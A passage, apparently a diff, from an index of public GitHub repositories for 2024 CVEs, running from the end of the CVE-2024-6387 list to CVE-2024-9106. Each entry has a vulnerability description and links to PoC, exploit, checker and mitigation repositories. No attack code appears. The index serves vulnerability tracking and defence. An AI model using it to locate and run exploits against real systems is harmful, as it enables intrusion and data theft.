[PrincipalAnthony/CVE-2024-6387-Updated-x64bit](https://github.com/PrincipalAnthony/CVE-2024-6387-Updated-x64bit) +- [skyalliance/CVE-2024-6387-POC](https://github.com/skyalliance/CVE-2024-6387-POC) +- [daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook](https://github.com/daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook) +- [rumochnaya/openssh-cve-2024-6387.sh](https://github.com/rumochnaya/openssh-cve-2024-6387.sh) +- [zenzue/CVE-2024-6387-Mitigation](https://github.com/zenzue/CVE-2024-6387-Mitigation) +- [devarshishimpi/CVE-2024-6387-Check](https://github.com/devarshishimpi/CVE-2024-6387-Check) +- [hssmo/cve-2024-6387_AImade](https://github.com/hssmo/cve-2024-6387_AImade) +- [ACHUX21/checker-CVE-2024-6387](https://github.com/ACHUX21/checker-CVE-2024-6387) +- [AiGptCode/ssh_exploiter_CVE-2024-6387](https://github.com/AiGptCode/ssh_exploiter_CVE-2024-6387) +- [xristos8574/regreSSHion-nmap-scanner](https://github.com/xristos8574/regreSSHion-nmap-scanner) +- [xonoxitron/regreSSHion](https://github.com/xonoxitron/regreSSHion) +- [no-one-sec/CVE-2024-6387](https://github.com/no-one-sec/CVE-2024-6387) +- [dawnl3ss/CVE-2024-6387](https://github.com/dawnl3ss/CVE-2024-6387) +- [MrR0b0t19/CVE-2024-6387-Exploit-POC](https://github.com/MrR0b0t19/CVE-2024-6387-Exploit-POC) +- [th3gokul/CVE-2024-6387](https://github.com/th3gokul/CVE-2024-6387) +- [n1cks0n/Test_CVE-2024-6387](https://github.com/n1cks0n/Test_CVE-2024-6387) +- [l0n3m4n/CVE-2024-6387](https://github.com/l0n3m4n/CVE-2024-6387) +- [RickGeex/CVE-2024-6387-Checker](https://github.com/RickGeex/CVE-2024-6387-Checker) +- [xonoxitron/regreSSHion-checker](https://github.com/xonoxitron/regreSSHion-checker) +- [BrandonLynch2402/cve-2024-6387-nuclei-template](https://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template) +- [edsonjt81/CVE-2024-6387_Check](https://github.com/edsonjt81/CVE-2024-6387_Check) +- [grupooruss/CVE-2024-6387](https://github.com/grupooruss/CVE-2024-6387) +- [CognisysGroup/CVE-2024-6387-Checker](https://github.com/CognisysGroup/CVE-2024-6387-Checker) +- [sxlmnwb/CVE-2024-6387](https://github.com/sxlmnwb/CVE-2024-6387) +- [Symbolexe/CVE-2024-6387](https://github.com/Symbolexe/CVE-2024-6387) +- [harshinsecurity/sentinelssh](https://github.com/harshinsecurity/sentinelssh) +- [t3rry327/cve-2024-6387-poc](https://github.com/t3rry327/cve-2024-6387-poc) +- [jocker2410/CVE-2024-6387_poc](https://github.com/jocker2410/CVE-2024-6387_poc) +- [liqhtnd/sshd-logingracetime0](https://github.com/liqhtnd/sshd-logingracetime0) +- [JackSparrowhk/ssh-CVE-2024-6387-poc](https://github.com/JackSparrowhk/ssh-CVE-2024-6387-poc) +- [turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker](https://github.com/turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker) +- [sms2056/CVE-2024-6387](https://github.com/sms2056/CVE-2024-6387) +- [invaderslabs/regreSSHion-CVE-2024-6387-](https://github.com/invaderslabs/regreSSHion-CVE-2024-6387-) +- [lala-amber/CVE-2024-6387](https://github.com/lala-amber/CVE-2024-6387) +- [4lxprime/regreSSHive](https://github.com/4lxprime/regreSSHive) +- [sardine-web/CVE-2024-6387_Check](https://github.com/sardine-web/CVE-2024-6387_Check) +- [0x4D31/cve-2024-6387_hassh](https://github.com/0x4D31/cve-2024-6387_hassh) +- [sardine-web/CVE-2024-6387-template](https://github.com/sardine-web/CVE-2024-6387-template) +- [imv7/CVE-2024-6387](https://github.com/imv7/CVE-2024-6387) +- [SiberianHacker/CVE-2024-6387-Finder](https://github.com/SiberianHacker/CVE-2024-6387-Finder) +- [azurejoga/CVE-2024-6387-how-to-fix](https://github.com/azurejoga/CVE-2024-6387-how-to-fix) +- [asterictnl-lvdw/CVE-2024-6387](https://github.com/asterictnl-lvdw/CVE-2024-6387) +- [vkaushik-chef/regreSSHion](https://github.com/vkaushik-chef/regreSSHion) +- [dgourillon/mitigate-CVE-2024-6387](https://github.com/dgourillon/mitigate-CVE-2024-6387) +- [mrmtwoj/CVE-2024-6387](https://github.com/mrmtwoj/CVE-2024-6387) +- [filipi86/CVE-2024-6387-Vulnerability-Checker](https://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker) +- [kubota/CVE-2024-6387-Vulnerability-Checker](https://github.com/kubota/CVE-2024-6387-Vulnerability-Checker) +- [DimaMend/cve-2024-6387-poc](https://github.com/DimaMend/cve-2024-6387-poc) +- [Sibijo/mitigate_ssh](https://github.com/Sibijo/mitigate_ssh) +- [Passyed/regreSSHion-Fix](https://github.com/Passyed/regreSSHion-Fix) +- [dream434/CVE-2024-6387](https://github.com/dream434/CVE-2024-6387) +- [ThatNotEasy/CVE-2024-6387](https://github.com/ThatNotEasy/CVE-2024-6387) +- [prelearn-code/CVE-2024-6387](https://github.com/prelearn-code/CVE-2024-6387) +- [l-urk/CVE-2024-6387](https://github.com/l-urk/CVE-2024-6387) +- [alex14324/ssh_poc2024](https://github.com/alex14324/ssh_poc2024) +- [X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker](https://github.com/X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker) +- [s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH](https://github.com/s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH) +- [almogopp/OpenSSH-CVE-2024-6387-Fix](https://github.com/almogopp/OpenSSH-CVE-2024-6387-Fix) +- [HadesNull123/CVE-2024-6387_Check](https://github.com/HadesNull123/CVE-2024-6387_Check) +- [identity-threat-labs/CVE-2024-6387-Vulnerability-Checker](https://github.com/identity-threat-labs/CVE-2024-6387-Vulnerability-Checker) +- [identity-threat-labs/Article-RegreSSHion-CVE-2024-6387](https://github.com/identity-threat-labs/Article-RegreSSHion-CVE-2024-6387) +- [anhvutuan/CVE-2024-6387-poc-1](https://github.com/anhvutuan/CVE-2024-6387-poc-1) +- [YassDEV221608/CVE-2024-6387](https://github.com/YassDEV221608/CVE-2024-6387) +- [zql-gif/CVE-2024-6387](https://github.com/zql-gif/CVE-2024-6387) +- [awusan125/test_for6387](https://github.com/awusan125/test_for6387) +- [YassDEV221608/CVE-2024-6387_PoC](https://github.com/YassDEV221608/CVE-2024-6387_PoC) + +### CVE-2024-6473 (2024-09-03) + +Yandex Browser for Desktop before 24.7.1.380 has a DLL Hijacking Vulnerability because an untrusted search path is used. + + +- [12345qwert123456/CVE-2024-6473-PoC](https://github.com/12345qwert123456/CVE-2024-6473-PoC) + +### CVE-2024-6529 (2024-08-01) + +The Ultimate Classified Listings WordPress plugin before 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin + + +- [Abdurahmon3236/CVE-2024-6529](https://github.com/Abdurahmon3236/CVE-2024-6529) + +### CVE-2024-6536 (2024-07-30) + +The Zephyr Project Manager WordPress plugin before 3.3.99 does not sanitise and escape some of its settings, which could allow high privilege users such as editors and admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) + + +- [apena-ba/CVE-2024-6536](https://github.com/apena-ba/CVE-2024-6536) + +### CVE-2024-6592 (2024-09-25) + +Incorrect Authorization vulnerability in the protocol communication between the WatchGuard Authentication Gateway (aka Single Sign-On Agent) on Windows and the WatchGuard Single Sign-On Client on Windows and MacOS allows Authentication Bypass.This issue affects the Authentication Gateway: through 12.10.2; Windows Single Sign-On Client: through 12.7; MacOS Single Sign-On Client: through 12.5.4. + + +- [RedTeamPentesting/watchguard-sso-client](https://github.com/RedTeamPentesting/watchguard-sso-client) + +### CVE-2024-6624 (2024-07-11) + +The JSON API User plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.9.3. This is due to improper controls on custom user meta fields. This makes it possible for unauthenticated attackers to register as administrators on the site. The plugin requires the JSON API plugin to also be installed. + + +- [RandomRobbieBF/CVE-2024-6624](https://github.com/RandomRobbieBF/CVE-2024-6624) + +### CVE-2024-6670 (2024-08-29) + +In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password. + + +- [sinsinology/CVE-2024-6670](https://github.com/sinsinology/CVE-2024-6670) + +### CVE-2024-6768 (2024-08-12) + +A Denial of Service in CLFS.sys in Microsoft Windows 10, Windows 11, Windows Server 2016, Windows Server 2019, and Windows Server 2022 allows a malicious authenticated low-privilege user to cause a Blue Screen of Death via a forced call to the KeBugCheckEx function. + + +- [fortra/CVE-2024-6768](https://github.com/fortra/CVE-2024-6768) + +### CVE-2024-6769 (2024-09-26) + +A DLL Hijacking caused by drive remapping combined with a poisoning of the activation cache in Microsoft Windows 10, Windows 11, Windows Server 2016, Windows Server 2019, and Windows Server 2022 allows a malicious authenticated attacker to elevate from a medium integrity process to a high integrity process without the intervention of a UAC prompt. + + +- [fortra/CVE-2024-6769](https://github.com/fortra/CVE-2024-6769) + +### CVE-2024-6778 (2024-07-16) + +Race in DevTools in Google Chrome prior to 126.0.6478.182 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: High) + + +- [ading2210/CVE-2024-6778-POC](https://github.com/ading2210/CVE-2024-6778-POC) +- [r00tjunip3r1/POC-CVE-2024-6778](https://github.com/r00tjunip3r1/POC-CVE-2024-6778) + +### CVE-2024-6782 (2024-08-06) + +Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution. + + +- [zangjiahe/CVE-2024-6782](https://github.com/zangjiahe/CVE-2024-6782) +- [jdpsl/CVE-2024-6782](https://github.com/jdpsl/CVE-2024-6782) +- [0xB0y426/CVE-2024-6782-PoC](https://github.com/0xB0y426/CVE-2024-6782-PoC) +- [NketiahGodfred/CVE-2024-6782](https://github.com/NketiahGodfred/CVE-2024-6782) + +### CVE-2024-7029 (2024-08-02) + +Commands can be injected over the network and executed without authentication. + + +- [bigherocenter/CVE-2024-7029-EXPLOIT](https://github.com/bigherocenter/CVE-2024-7029-EXPLOIT) +- [ebrasha/CVE-2024-7029](https://github.com/ebrasha/CVE-2024-7029) +- [geniuszly/CVE-2024-7029](https://github.com/geniuszly/CVE-2024-7029) + +### CVE-2024-7094 (2024-08-13) + +The JS Help Desk – The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.8.6 via the 'storeTheme' function. This is due to a lack of sanitization on user-supplied values, which replace values in the style.php file, along with missing capability checks. This makes it possible for unauthenticated attackers to execute code on the server. This issue was partially patched in 2.8.6 when the code injection issue was resolved, and fully patched in 2.8.7 when the missing authorization and cross-site request forgery protection was added. + + +- [nastar-id/CVE-2024-7094](https://github.com/nastar-id/CVE-2024-7094) + +### CVE-2024-7120 (2024-07-26) + +Es wurde eine kritische Schwachstelle in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 gefunden. Hiervon betroffen ist ein unbekannter Codeblock der Datei list_base_config.php der Komponente Web Interface. Durch die Manipulation des Arguments template mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [gh-ost00/CVE-2024-7120](https://github.com/gh-ost00/CVE-2024-7120) + +### CVE-2024-7124 (2024-11-14) + +Improper Neutralization of Input During Web Page Generation vulnerability in DInGO dLibra software in the parameter 'filter' in the endpoint 'indexsearch' allows a Reflected Cross-Site Scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects DInGO dLibra software in versions from 6.0 before 6.3.20. + + +- [kac89/CVE-2024-7124](https://github.com/kac89/CVE-2024-7124) + +### CVE-2024-7135 (2024-07-31) + +The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + + +- [RandomRobbieBF/CVE-2024-7135](https://github.com/RandomRobbieBF/CVE-2024-7135) +- [Nxploited/CVE-2024-7135](https://github.com/Nxploited/CVE-2024-7135) + +### CVE-2024-7313 (2024-08-26) + +The Shield Security WordPress plugin before 20.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + + +- [Wayne-Ker/CVE-2024-7313](https://github.com/Wayne-Ker/CVE-2024-7313) + +### CVE-2024-7339 (2024-08-01) + +In TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T wurde eine problematische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei /queryDevInfo. Dank der Manipulation mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [RevoltSecurities/CVE-2024-7339](https://github.com/RevoltSecurities/CVE-2024-7339) + +### CVE-2024-7456 (2024-11-01) + +A SQL injection vulnerability exists in the `/api/v1/external-users` route of lunary-ai/lunary version v1.4.2. The `order by` clause of the SQL query uses `sql.unsafe` without prior sanitization, allowing for SQL injection. The `orderByClause` variable is constructed without server-side validation or sanitization, enabling an attacker to execute arbitrary SQL commands. Successful exploitation can lead to complete data loss, modification, or corruption. + + +- [77Philly/CVE-2024-7456scripts](https://github.com/77Philly/CVE-2024-7456scripts) + +### CVE-2024-7479 (2024-09-25) + +Improper verification of cryptographic signature during installation of a VPN driver via the TeamViewer_service.exe component of TeamViewer Remote Clients prior version 15.58.4 for Windows allows an attacker with local unprivileged access on a Windows system to elevate their privileges and install drivers. + + +- [PeterGabaldon/CVE-2024-7479_CVE-2024-7481](https://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481) + +### CVE-2024-7514 (2024-10-11) + +The WordPress Comments Import & Export plugin for WordPress is vulnerable to to arbitrary file read due to insufficient file path validation during the comments import process, in versions up to, and including, 2.3.7. This makes it possible for authenticated attackers, with Author-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.\r\nThe issue was partially fixed in version 2.3.8 and fully fixed in 2.3.9 + + +- [RandomRobbieBF/CVE-2024-7514](https://github.com/RandomRobbieBF/CVE-2024-7514) + +### CVE-2024-7593 (2024-08-13) + +Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel. + + +- [rxerium/CVE-2024-7593](https://github.com/rxerium/CVE-2024-7593) +- [D3N14LD15K/CVE-2024-7593_PoC_Exploit](https://github.com/D3N14LD15K/CVE-2024-7593_PoC_Exploit) +- [skyrowalker/CVE-2024-7593](https://github.com/skyrowalker/CVE-2024-7593) + +### CVE-2024-7646 (2024-08-16) + +A security issue was discovered in ingress-nginx where an actor with permission to create Ingress objects (in the `networking.k8s.io` or `extensions` API group) can bypass annotation validation to inject arbitrary commands and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster. + + +- [r0binak/CVE-2024-7646](https://github.com/r0binak/CVE-2024-7646) +- [dovics/cve-2024-7646](https://github.com/dovics/cve-2024-7646) + +### CVE-2024-7703 (2024-08-17) + +The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.37 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + + +- [lfillaz/CVE-2024-7703](https://github.com/lfillaz/CVE-2024-7703) + +### CVE-2024-7808 (2024-08-15) + +Es wurde eine kritische Schwachstelle in code-projects Job Portal 1.0 ausgemacht. Betroffen hiervon ist ein unbekannter Ablauf der Datei logindbc.php. Dank Manipulation des Arguments email mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [TheUnknownSoul/CVE-2024-7808](https://github.com/TheUnknownSoul/CVE-2024-7808) + +### CVE-2024-7854 (2024-08-21) + +The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2024-7854](https://github.com/RandomRobbieBF/CVE-2024-7854) + +### CVE-2024-7856 (2024-08-29) + +The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted. + + +- [l8BL/CVE-2024-7856](https://github.com/l8BL/CVE-2024-7856) + +### CVE-2024-7928 (2024-08-19) + +Eine problematische Schwachstelle wurde in FastAdmin bis 1.3.3.20220121 entdeckt. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei /index/ajax/lang. Durch Manipulation des Arguments lang mit unbekannten Daten kann eine path traversal-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.3.4.20220530 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [bigb0x/CVE-2024-7928](https://github.com/bigb0x/CVE-2024-7928) +- [gh-ost00/CVE-2024-7928](https://github.com/gh-ost00/CVE-2024-7928) +- [wh6amiGit/CVE-2024-7928](https://github.com/wh6amiGit/CVE-2024-7928) +- [th3gokul/CVE-2024-7928](https://github.com/th3gokul/CVE-2024-7928) + +### CVE-2024-7954 (2024-08-23) + +The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. + + +- [Chocapikk/CVE-2024-7954](https://github.com/Chocapikk/CVE-2024-7954) +- [bigb0x/CVE-2024-7954](https://github.com/bigb0x/CVE-2024-7954) +- [gh-ost00/CVE-2024-7954-RCE](https://github.com/gh-ost00/CVE-2024-7954-RCE) +- [TheCyberguy-17/RCE_CVE-2024-7954](https://github.com/TheCyberguy-17/RCE_CVE-2024-7954) +- [MuhammadWaseem29/RCE-CVE-2024-7954](https://github.com/MuhammadWaseem29/RCE-CVE-2024-7954) +- [issamjr/CVE-2024-7954](https://github.com/issamjr/CVE-2024-7954) +- [zxj-hub/CVE-2024-7954POC](https://github.com/zxj-hub/CVE-2024-7954POC) +- [0dayan0n/RCE_CVE-2024-7954-](https://github.com/0dayan0n/RCE_CVE-2024-7954-) + +### CVE-2024-7965 (2024-08-21) + +Inappropriate implementation in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [bi-zone/CVE-2024-7965](https://github.com/bi-zone/CVE-2024-7965) +- [XiaomingX/cve-2024-7965-poc](https://github.com/XiaomingX/cve-2024-7965-poc) + +### CVE-2024-8069 (2024-11-12) + +Limited remote code execution with privilege of a NetworkService Account access in Citrix Session Recording if the attacker is an authenticated user on the same intranet as the session recording server + + +- [XiaomingX/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN](https://github.com/XiaomingX/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN) + +### CVE-2024-8190 (2024-09-10) + +An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability. + + +- [horizon3ai/CVE-2024-8190](https://github.com/horizon3ai/CVE-2024-8190) + +### CVE-2024-8275 (2024-09-25) + +The The Events Calendar plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'tribe_has_next_event' function in all versions up to, and including, 6.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Only sites that have manually added tribe_has_next_event() will be vulnerable to this SQL injection. + + +- [p33d/CVE-2024-8275](https://github.com/p33d/CVE-2024-8275) +- [whiterose7777/CVE-2024-8275](https://github.com/whiterose7777/CVE-2024-8275) + +### CVE-2024-8277 (2024-09-11) + +The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully. + + +- [PolatBey/CVE-2024-8277](https://github.com/PolatBey/CVE-2024-8277) + +### CVE-2024-8309 (2024-10-29) + +A vulnerability in the GraphCypherQAChain class of langchain-ai/langchain version 0.2.5 allows for SQL injection through prompt injection. This vulnerability can lead to unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database. + + +- [liadlevy/CVE-2024-8309](https://github.com/liadlevy/CVE-2024-8309) + +### CVE-2024-8349 (2024-09-25) + +The Uncanny Groups for LearnDash plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0.1. This is due to the plugin not properly restricting what users a group leader can edit. This makes it possible for authenticated attackers, with group leader-level access and above, to change admin account email addresses which can subsequently lead to admin account access. + + +- [karlemilnikka/CVE-2024-8349-and-CVE-2024-8350](https://github.com/karlemilnikka/CVE-2024-8349-and-CVE-2024-8350) + +### CVE-2024-8353 (2024-09-28) + +The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1 via deserialization of untrusted input via several parameters like 'give_title' and 'card_address'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files and achieve remote code execution. This is essentially the same vulnerability as CVE-2024-5932, however, it was discovered the the presence of stripslashes_deep on user_info allows the is_serialized check to be bypassed. This issue was mostly patched in 3.16.1, but further hardening was added in 3.16.2. + + +- [EQSTLab/CVE-2024-8353](https://github.com/EQSTLab/CVE-2024-8353) + +### CVE-2024-8484 (2024-09-25) + +The REST API TO MiniProgram plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the /wp-json/watch-life-net/v1/comment/getcomments REST API endpoint in all versions up to, and including, 4.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2024-8484](https://github.com/RandomRobbieBF/CVE-2024-8484) + +### CVE-2024-8504 (2024-09-10) + +An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective. + + +- [Chocapikk/CVE-2024-8504](https://github.com/Chocapikk/CVE-2024-8504) +- [havokzero/ViciDial](https://github.com/havokzero/ViciDial) + +### CVE-2024-8517 (2024-09-06) + +SPIP before 4.3.2, 4.2.16, and \n4.1.18 is vulnerable to a command injection issue. A \nremote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request. + + +- [Chocapikk/CVE-2024-8517](https://github.com/Chocapikk/CVE-2024-8517) + +### CVE-2024-8522 (2024-09-12) + +The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [Avento/CVE-2024-8522](https://github.com/Avento/CVE-2024-8522) + +### CVE-2024-8529 (2024-09-12) + +The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2024-8529](https://github.com/RandomRobbieBF/CVE-2024-8529) + +### CVE-2024-8672 (2024-11-28) + +The Widget Options – The #1 WordPress Widget & Block Control Plugin plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.0.7 via the display logic functionality that extends several page builders. This is due to the plugin allowing users to supply input that will be passed through eval() without any filtering or capability checks. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server. Special note: We suggested the vendor implement an allowlist of functions and limit the ability to execute commands to just administrators, however, they did not take our advice. We are considering this patched, however, we believe it could still be further hardened and there may be residual risk with how the issue is currently patched. + + +- [Chocapikk/CVE-2024-8672](https://github.com/Chocapikk/CVE-2024-8672) + +### CVE-2024-8698 (2024-09-19) + +A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks. + + +- [huydoppaz/CVE-2024-8698-POC](https://github.com/huydoppaz/CVE-2024-8698-POC) + +### CVE-2024-8752 (2024-09-16) + +The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system. + + +- [D3anSPGDMS/CVE-2024-8752](https://github.com/D3anSPGDMS/CVE-2024-8752) + +### CVE-2024-8856 (2024-11-16) + +The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the the UploadHandler.php file and no direct file access prevention in all versions up to, and including, 1.22.21. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [ubaii/CVE-2024-8856](https://github.com/ubaii/CVE-2024-8856) +- [Jenderal92/CVE-2024-8856](https://github.com/Jenderal92/CVE-2024-8856) + +### CVE-2024-8868 (2024-09-15) + +Eine Schwachstelle wurde in code-projects Crud Operation System 1.0 ausgemacht. Sie wurde als kritisch eingestuft. Davon betroffen ist unbekannter Code der Datei savedata.php. Durch Manipulieren des Arguments sname mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [M0onc/CVE-2024-8868](https://github.com/M0onc/CVE-2024-8868) + +### CVE-2024-8949 (2024-09-17) + +Es wurde eine Schwachstelle in SourceCodester Online Eyewear Shop 1.0 entdeckt. Sie wurde als kritisch eingestuft. Es geht dabei um eine nicht klar definierte Funktion der Datei /classes/Master.php der Komponente Cart Content Handler. Mittels Manipulieren des Arguments cart_id/id mit unbekannten Daten kann eine improper ownership management-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [gh-ost00/CVE-2024-8949-POC](https://github.com/gh-ost00/CVE-2024-8949-POC) + +### CVE-2024-8963 (2024-09-19) + +Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality. + + +- [patfire94/CVE-2024-8963](https://github.com/patfire94/CVE-2024-8963) + +### CVE-2024-9014 (2024-09-23) + +pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data. + + +- [EQSTLab/CVE-2024-9014](https://github.com/EQSTLab/CVE-2024-9014) + +### CVE-2024-9047 (2024-10-12) + +The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier. + + +- [iSee857/CVE-2024-9047-PoC](https://github.com/iSee857/CVE-2024-9047-PoC) + +### CVE-2024-9061 (2024-10-16) + +The The WP Popup Builder – Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. NOTE: This vulnerability was partially fixed in version 1.3.5 with a nonce check, which effectively prevented access to the affected function. However, version 1.3.6 incorporates the correct authorization check to prevent unauthorized access. + + +- [RandomRobbieBF/CVE-2024-9061](https://github.com/RandomRobbieBF/CVE-2024-9061) + +### CVE-2024-9106 (2024-10-01) + +The Wechat Social login plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.3.0. This is due to insufficient verification on the user being supplied during the social login. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. This 